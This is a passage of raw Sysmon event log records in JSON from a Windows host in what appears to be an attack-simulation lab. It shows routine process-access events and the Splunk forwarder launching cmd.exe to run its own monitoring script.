C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.513","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-0010A9500500}","TargetProcessId":"4680","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3528,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.748\r\nProcessGuid: {A837DB8D-023C-5F25-0000-00106E530500}\r\nProcessId: 4800\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\MonitorNoHandle.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.748","ProcessGuid":"{A837DB8D-023C-5F25-0000-00106E530500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\MonitorNoHandle.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3529,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.748\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 4232\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-00106E530500}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.748","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"4232","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-00106E530500}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3530,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.748\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-00106E530500}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.748","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-00106E530500}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3531,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.748\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.748","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3532,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.748\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.748","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3533,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.748\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.748","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3534,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.748\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.748","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3535,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.748\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.748","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYST